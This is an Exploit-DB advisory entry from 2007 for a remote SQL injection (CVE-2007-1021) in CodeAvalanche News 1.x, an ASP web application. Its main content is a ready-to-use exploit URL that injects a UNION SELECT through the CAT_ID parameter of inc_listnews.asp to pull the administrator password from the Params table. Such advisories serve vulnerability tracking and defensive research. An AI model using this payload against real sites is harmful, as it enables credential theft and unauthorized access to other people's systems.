CodeAvalanche News 1.x CAT_ID Remote SQL Injection Vulnerability

2007-02-15T00:00:00
ID EDB-ID:3317
Type exploitdb
Reporter beks
Modified 2007-02-15T00:00:00

Description

CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability. CVE-2007-1021. Webapps exploit for asp platform

                                        
                                            #CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# milw0rm.com [2007-02-15]